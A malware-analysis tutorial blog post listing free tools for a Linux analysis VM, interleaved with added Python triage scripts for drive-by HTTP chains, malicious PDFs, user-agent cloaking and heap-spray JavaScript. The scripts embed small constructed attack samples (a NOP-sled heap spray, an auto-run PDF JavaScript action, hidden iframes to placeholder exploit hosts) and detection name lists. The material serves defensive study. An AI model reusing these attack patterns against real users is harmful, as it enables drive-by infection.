Attributes of a Zero Dollar Malware Analysis System

Please note this environment is not meant to be a sandbox but rather an environment in which one can conduct research on malware while, for the most part, not executing it (if you count malicious code on a website as malware, then that code will of course still execute in the browser). However, most downloaded critters won't execute in this environment, since they are Windows binaries and this is a Linux box. Treat that as a convenience, not as isolation: keep the VM on an isolated network and snapshot it before each investigation. Please visit the upcoming desktop support article for detailed instructions on how to set up and leverage this environment without spreading infections.

Virtual Environment

Selecting a virtual environment is fairly easy, however it does bring about a lot of debate. Personally I don't understand the argument. If you are looking for a desktop virtualization product but are not willing to pay for one, go with Sun xVM VirtualBox. Its networking can occasionally cause issues, but on the whole it seems to work a lot better than VMware Player. I have a copy of VMware Workstation and prefer that, so VMware Server is also a valid choice, but it requires more set up than I felt like doing. Thus, here are the primary desktop virtualization options for the basic Malware Analysis Environment we're going to set up today.

Sun xVM VirtualBox (http://www.virtualbox.org/wiki/Downloads)

VMware Player (https://www.vmware.com/tryvmware/?p=player&lp=1&sourceid=chrome&ie=UTF-8&q=VMware%20Virtual%20Player)

The Operating System: Ubuntu

A generic copy of Ubuntu 9.10 is easy to use and extremely powerful. In addition, many of the tools necessary for observing malware are open-source or Linux-specific. A Linux system, however, will most likely not execute the actual (Windows) malware. This is both a positive and a negative: it creates a somewhat safer environment for dissecting the malware, but it also makes observing what the malware does a touch more difficult. It is for the latter reason that it is recommended that users utilize resources such as CWSandbox and ThreatExpert for analyzing the execution of malware.

Traffic Analysis Tools

Wireshark (sudo apt-get install wireshark)

Wireshark is something of an industry standard for packet capture and analysis through a graphical user interface, and it is extremely useful for analyzing malware delivered through web applications. With a capture of the browsing session loaded, following each HTTP stream lets you pick out unauthorized redirects, attempts at delivering payloads, and attempts to pull down malware onto the machine.
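As an added illustration (not part of the original post, and not Wireshark code), here is what an analyst looks for when following the HTTP streams of a drive-by capture, written as a small Python triage routine: it flags 3xx redirects, hidden iframes, meta refreshes, and a PE executable served under a misleading content type. The three responses are constructed for the example and the host names are placeholders; a real session would be exported from the capture (Wireshark's "Follow TCP Stream" or "Export Objects").

```python
import re

# Constructed HTTP responses of the kind "Follow TCP Stream" shows for a
# drive-by chain (landing page -> redirector -> exploit page -> binary).
# Not from a real capture; the host names are placeholders.
SAMPLES = {
    "landing": (
        b"HTTP/1.1 302 Found\r\n"
        b"Location: http://redirector.example/go?id=7\r\n"
        b"Content-Length: 0\r\n\r\n"
    ),
    "redirector": (
        b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
        b"<html><body>Loading..."
        b'<iframe src="http://exploit.example/pdf.php" width="0" height="0"></iframe>'
        b'<meta http-equiv="refresh" content="0;url=http://exploit.example/index.php">'
        b"</body></html>"
    ),
    # Binary served as an image: a PE file starts with the "MZ" magic.
    "payload": (
        b"HTTP/1.1 200 OK\r\nContent-Type: image/gif\r\nContent-Length: 64\r\n\r\n"
        b"MZ\x90\x00" + b"\x00" * 60
    ),
}

IFRAME_RE = re.compile(rb'<iframe\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
REFRESH_RE = re.compile(rb'http-equiv\s*=\s*["\']?refresh["\']?[^>]*\burl=([^"\'\s>]+)', re.I)
HIDDEN_RE = re.compile(rb'\b(width|height)\s*=\s*["\']?0\b|visibility\s*:\s*hidden|display\s*:\s*none', re.I)


def parse_response(raw):
    """Split a raw HTTP response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode(errors="replace")
    return status, headers, body


def triage_response(raw):
    """Return a list of (finding, detail) tuples for one HTTP response."""
    status, headers, body = parse_response(raw)
    findings = []
    if 300 <= status < 400 and "location" in headers:
        findings.append(("redirect", headers["location"]))
    for m in IFRAME_RE.finditer(body):
        tag = body[m.start():body.find(b">", m.end()) + 1]
        kind = "hidden-iframe" if HIDDEN_RE.search(tag) else "iframe"
        findings.append((kind, m.group(1).decode(errors="replace")))
    for m in REFRESH_RE.finditer(body):
        findings.append(("meta-refresh", m.group(1).decode(errors="replace")))
    if body.startswith(b"MZ"):
        # Executables are routinely labelled as images or text to slip past
        # content-type based filtering; the magic bytes give them away.
        findings.append(("pe-executable", headers.get("content-type", "unknown")))
    return findings


def triage_chain(responses):
    """Triage each response of a session in order; returns {name: findings}."""
    return {name: triage_response(raw) for name, raw in responses.items()}


if __name__ == "__main__":
    for name, findings in triage_chain(SAMPLES).items():
        for kind, detail in findings:
            print(f"{name:12s} {kind:15s} {detail}")
```

The point of the chain view is that each hop on its own looks harmless (a redirect, a GIF); only the sequence shows the landing page handing the browser to the exploit host and the exploit host handing back an executable.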

EtherApe (sudo apt-get install etherape)

Following what is happening in a full packet capture can often be difficult, however. That is where EtherApe comes in. EtherApe monitors network activity through a graphical representation of the hosts and the connections between them. This visual representation of network traffic is valuable for spotting unexpected channels that should then be tracked down in the capture.

NetWitness Investigator (http://www.netwitness.com)

Although NetWitness Investigator is not a Linux utility, it is extremely useful in analyzing malware. Packet captures can be loaded into NetWitness Investigator in order to forensically investigate network traffic as well as to run the entire capture against multiple threat feeds. This helps in determining the reputation of the IP addresses involved in a malware attack.

Snort (http://www.snort.org)

The inclusion of the world's most recognizable open-source intrusion detection system is obvious. Snort can help identify the type of attack being run as well as serve as an excellent guide to which parts of the captured traffic deserve a closer look. Snort can either be run live while observing how malware is delivered, or it can be run against packet captures after the fact (snort -r capture.pcap -c snort.conf).

Malware Analysis Tools

PDF-Parser (http://blog.didierstevens.com/programs/pdf-tools/)

A lot of current exploits target Adobe Reader. As a result a large amount of malware infects machines through the delivery of maliciously crafted .pdf documents. Thus, tools like pdf-parser (and its companion pdfid, from the same page), which let investigators see what is housed within a PDF's objects and streams, are essential.
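As an added example (not from the original post and not pdf-parser's own code), here is the core of what pdf-parser and pdfid do, in plain Python: walk the objects of a PDF, undo the #xx name escaping attackers use to hide /JavaScript from a grep, flag the names that run code or open things on load, and inflate a FlateDecode stream to get at the script. The PDF is constructed inside the block; it is not a real sample.

```python
import re
import zlib

# Names that run code or open something when the document loads; the same
# list pdfid counts.
SUSPICIOUS = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
              "/EmbeddedFile", "/RichMedia", "/URI")

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def build_sample_pdf():
    """Constructed sample (not a real-world file): the catalog's OpenAction points
    at a JavaScript action whose script is FlateDecode-compressed, and the
    /OpenAction and /JavaScript names are written with #xx hex escapes so that a
    plain grep for "JavaScript" finds nothing."""
    script = b'var s = unescape("%u9090%u9090"); app.alert("hello");'
    compressed = zlib.compress(script)
    return (
        b"%PDF-1.4\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /#4FpenAction 3 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
        b"3 0 obj << /S /#4Aava#53cript /JS 4 0 R >> endobj\n"
        b"4 0 obj << /Length " + str(len(compressed)).encode() +
        b" /Filter /FlateDecode >>\nstream\n" + compressed + b"\nendstream\nendobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )


def normalize_names(data):
    """PDF lets any byte of a name be written as #xx; undo that so /#4Aava#53cript
    compares equal to /JavaScript. Applied to dictionaries only, never to stream data."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def parse_objects(pdf):
    """Return {object number: {"dict": normalized dictionary, "stream": raw stream or None}}."""
    objs = {}
    for m in OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(3)
        sm = STREAM_RE.search(body)
        if sm:
            dict_part, stream = body[:sm.start()], sm.group(1)
        else:
            dict_part, stream = body, None
        objs[num] = {"dict": normalize_names(dict_part), "stream": stream}
    return objs


def decode_stream(obj):
    """Inflate a FlateDecode stream; other filters are returned raw for manual handling."""
    if obj["stream"] is None:
        return None
    if b"/FlateDecode" in obj["dict"]:
        try:
            return zlib.decompress(obj["stream"])
        except zlib.error:
            return obj["stream"]  # truncated or deliberately corrupted: hand back raw bytes
    return obj["stream"]


def triage(pdf):
    """Return (objects, {object number: [suspicious names found in its dictionary]})."""
    objs = parse_objects(pdf)
    hits = {}
    for num, obj in objs.items():
        found = [name for name in SUSPICIOUS
                 if re.search(re.escape(name.encode()) + rb"(?![A-Za-z0-9])", obj["dict"])]
        if found:
            hits[num] = found
    return objs, hits


if __name__ == "__main__":
    objs, hits = triage(build_sample_pdf())
    for num, names in hits.items():
        print(f"obj {num}: {' '.join(names)}")
    print(decode_stream(objs[4]))
```

Two habits this encodes: normalize names before searching (a file with no literal "JavaScript" in it can still carry a script), and treat an inflate failure as a finding rather than an error, since streams are sometimes deliberately damaged so that only Reader's lenient parser will read them.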

jsunpack-n (http://jsunpack.jeek.org/jsunpack-n.tgz)

jsunpack-n is a tool specifically designed to assist security researchers in the analysis of malware-infected websites. jsunpack-n describes itself as a "generic JavaScript unpacker." However, it has several features that go well beyond unpacking.

Paros Proxy (http://www.parosproxy.org/download.shtml)

Paros Proxy is a web proxy that runs locally on the analysis machine. Paros allows investigators to trap specific requests and responses in order to more easily track what is being delivered to a system. Paros Proxy can also be leveraged to spider web applications should a detected piece of malware turn out to be only one component of a larger attack. For example, many malware-infected sites use separate scripts to perform the heap spray or to carry the shellcode. In these situations alerts that detect the heap spray attempt or the shellcode may fire, yet the controlling page may be difficult to find. In such a scenario spidering the site may turn up the controlling page of the infection.

Burp Suite (http://www.portswigger.net/suite/)

Burp Suite is similar to Paros Proxy in its usage for malware analysis, as it too is a web proxy that runs locally. However, Burp Suite is much more powerful than Paros. In the opinion of SecAnalysis, though, the user interface is not nearly as pretty or as user friendly.

Assembly Language Debugger (http://ald.sourceforge.net/)

SecAnalysis' preferences for graphical debuggers are Immunity Debugger, OllyDbg and IDA Pro. However, getting any of these to run in an Ubuntu environment can be somewhat challenging and often requires Windows emulation (Wine). Thus, the Assembly Language Debugger is preferred for this type of malware analysis environment.

strings (pre-installed on Ubuntu)

strings extracts the printable character sequences from a binary file, such as a .jpg or an executable, and prints them in an easy-to-read fashion. Pulling URLs, file names, registry keys and obvious shellcode markers out of a file this way is an essential first step in manual analysis. Remember that Windows binaries often keep their interesting strings in UTF-16, which the default run misses; strings -e l file picks those up.

Firefox & Plugins

User Agent Switcher (https://addons.mozilla.org/en-US/firefox/addon/59)

Sometimes malware-infected websites will first detect which browser is attempting to access the site. Once the site has identified the browser version, it decides what malware to deliver or whether to deliver malware at all. Thus, using User Agent Switcher to spoof IE 6, IE 7, IE 8, search bots and even the iPhone can help get past these detection mechanisms.
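An added example (not from the original post) of the check that User Agent Switcher lets you do by hand: fetch the same URL under several User-Agent strings and group the responses by digest, so that the browsers served something different stand out. The server in the block is a constructed stand-in for a cloaking site and its URL is a placeholder; fetch_with_ua is the real-network helper and is only used if you pass it a live URL.

```python
import hashlib
import urllib.request

# The same set of identities User Agent Switcher offers (IE 6/7/8, a search bot,
# an iPhone) plus the analysis box's own browser for comparison.
USER_AGENTS = {
    "ie6": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
    "ie7": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
    "ie8": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "iphone": "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) "
              "AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16",
    "firefox": "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.5) Gecko/20091102 "
               "Ubuntu/9.10 (karmic) Firefox/3.5.5",
}


def fetch_with_ua(url, ua, timeout=15):
    """Fetch url presenting the given User-Agent. Only used against a live URL;
    run it from the isolated analysis VM, never from a workstation."""
    req = urllib.request.Request(url, headers={"User-Agent": ua})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


def compare_by_user_agent(url, fetch=fetch_with_ua, agents=USER_AGENTS):
    """Fetch url once per identity and group identities by the SHA-256 of the body.
    One group means the site does not cloak on User-Agent; several groups show which
    browsers got a different page, and the smaller groups are the ones to look at."""
    groups = {}
    sizes = {}
    for name, ua in agents.items():
        body = fetch(url, ua)
        digest = hashlib.sha256(body).hexdigest()
        groups.setdefault(digest, []).append(name)
        sizes[digest] = len(body)
    variants = [{"agents": names, "size": sizes[d], "sha256": d} for d, names in groups.items()]
    variants.sort(key=lambda v: len(v["agents"]), reverse=True)
    return variants


def cloaking_targets(variants):
    """Identities that received something other than the majority page."""
    return [name for v in variants[1:] for name in v["agents"]]


# Constructed stand-in for a cloaking server (not a real site): the hidden iframe
# is only served to IE 6 and IE 7; everyone else, the crawler included, gets a
# clean page so the site looks harmless to search engines and to analysts.
def fake_cloaking_server(url, ua):
    clean = b"<html><body><p>Welcome</p></body></html>"
    if "MSIE 6.0" in ua or "MSIE 7.0" in ua:
        return (b"<html><body><p>Welcome</p>"
                b'<iframe src="http://exploit.example/in.php" width="0" height="0"></iframe>'
                b"</body></html>")
    return clean


if __name__ == "__main__":
    variants = compare_by_user_agent("http://suspect.example/", fetch=fake_cloaking_server)
    for v in variants:
        print(f"{v['size']:6d} bytes  {v['sha256'][:12]}  {', '.join(v['agents'])}")
    print("served a different page:", cloaking_targets(variants))
```

The same diffing works for the other things a kit keys on (Referer, Accept-Language, a cookie set on the first visit); swap the header in fetch_with_ua and keep the grouping. Many kits also serve the exploit once per source IP, so a second fetch from the same VM may come back clean regardless of User-Agent.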

Web Developer (https://addons.mozilla.org/en-US/firefox/addon/60)

Web Developer has a ton of uses in observing malware. It can be especially helpful in tracking down pesky iframes and hidden form fields. Essentially Web Developer lets the user control how client-side code is rendered (outlining frames, disabling JavaScript, viewing the generated source) and assists in reviewing malware-infected web sites.

Websites

Wepawet can be highly useful for analyzing malicious JavaScript, infected Flash sites, and infected PDF documents. Wepawet often misses new infections, however, so caution should be used when relying on it.

VirusTotal runs a submitted file against multiple antivirus scanners, giving users some indication of detection. It should be noted, however, that simply saving a malicious web page to a file is more likely to trigger generic signatures, whereas pulling the shellcode out of the page and turning it into an executable (http://sandsprite.com/shellcode_2_exe.php) can produce more descriptive results. Use caution, though: an executable built with the sandsprite tool has in the past produced generic VirusTotal results such as "Downloader" or "Troj_Downloader" even with non-malicious code. This suggests that the wrapper sandsprite adds around the shellcode may cause certain AV vendors to alert regardless of the shellcode that is meant to be analyzed.

CWSandbox will actively execute malicious code and observe the effects the code has on an environment. This is especially useful while working from a Linux environment that cannot run the sample itself.

ThreatExpert conducts activities similar to CWSandbox, but its reports can often be more useful.
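An added example (not from the original post, and not jsunpack-n's or sandsprite's code) of the step that ties the jsunpack-n entry, the heap spray discussion under Paros Proxy, and the VirusTotal note above together: pull the unescape("%u...") literals out of a spray script, decode them to the bytes they occupy in memory, separate the NOP sled from the shellcode, and hash the shellcode for a VirusTotal lookup or write it out for shellcode_2_exe. The script is constructed for the example; the bytes of its shellcode stub are only a plausible prologue, not a working payload.

```python
import hashlib
import re
import struct

# Constructed script of the kind a heap-spray page embeds, not lifted from a
# real site: a NOP sled and a short shellcode stub are built with unescape()
# and copied into many large strings so that the heap is covered.
SAMPLE_JS = r'''
var nops = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
var sc = unescape("%uE8FC%u0082%u0000%u8960%u31E5%u64C0%u508B%u8B30%u0C52");
var block = nops + sc;
while (block.length < 0x10000) block += nops;
var spray = new Array();
for (var i = 0; i < 200; i++) spray[i] = block.substring(0, 0x10000 - sc.length) + sc;
'''

UNESCAPE_RE = re.compile(r'''unescape\(\s*(['"])(.*?)\1\s*\)''', re.S)
HEX4 = re.compile(r"[0-9A-Fa-f]{4}")
HEX2 = re.compile(r"[0-9A-Fa-f]{2}")


def decode_unescape(s):
    """Decode the argument of JavaScript unescape(): %uXXXX is a UTF-16 code unit
    stored little-endian (so %uE8FC lands in memory as FC E8); %XX is one byte.
    Anything that is not a valid escape is kept as a literal character."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s.startswith("%u", i) and HEX4.fullmatch(s[i + 2:i + 6]):
            out += struct.pack("<H", int(s[i + 2:i + 6], 16))
            i += 6
        elif s[i] == "%" and HEX2.fullmatch(s[i + 1:i + 3]):
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(ord(s[i]) & 0xFF)
            i += 1
    return bytes(out)


def extract_payloads(js):
    """Decoded bytes of every unescape("...") literal in the script, in source order."""
    return [decode_unescape(m.group(2)) for m in UNESCAPE_RE.finditer(js)]


def is_sled(payload, min_len=8):
    """A spray sled is a long run of one byte (0x90 NOP, or slide bytes such as 0x0C/0x0D)."""
    return len(payload) >= min_len and len(set(payload)) == 1


def triage(js):
    """Separate sleds from shellcode candidates and hash the candidates for lookup."""
    payloads = extract_payloads(js)
    sleds = [p for p in payloads if is_sled(p)]
    shellcode = [p for p in payloads if not is_sled(p)]
    return {
        "sleds": sleds,
        "shellcode": shellcode,
        # Search VirusTotal by hash first; only upload if nobody has seen it yet.
        "sha256": [hashlib.sha256(p).hexdigest() for p in shellcode],
    }


def save_raw(payload, path):
    """Write the raw bytes for shellcode_2_exe or a debugger; returns bytes written."""
    with open(path, "wb") as fh:
        return fh.write(payload)


if __name__ == "__main__":
    result = triage(SAMPLE_JS)
    for p in result["sleds"]:
        print(f"sled: {len(p)} bytes of {p[0]:#04x}")
    for p, digest in zip(result["shellcode"], result["sha256"]):
        print(f"shellcode: {len(p)} bytes, starts {p[:6].hex()}, sha256 {digest}")
```

Submitting the raw shellcode bytes (or a hash of them) avoids the generic "Downloader" verdicts the sandsprite wrapper can provoke, because nothing but the attacker's code is being scanned. Scripts that build the string through eval or String.fromCharCode rather than a literal unescape need jsunpack-n's interpreter first; this block only handles the literal form.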

*Whoa whoa, did I mess something up or forget something? Don't get mad…just let me know: shoot me an e-mail at mmontecillo "a"-with-a-circle-around-it secanalysis.com or hit me up on Twitter @Montejam.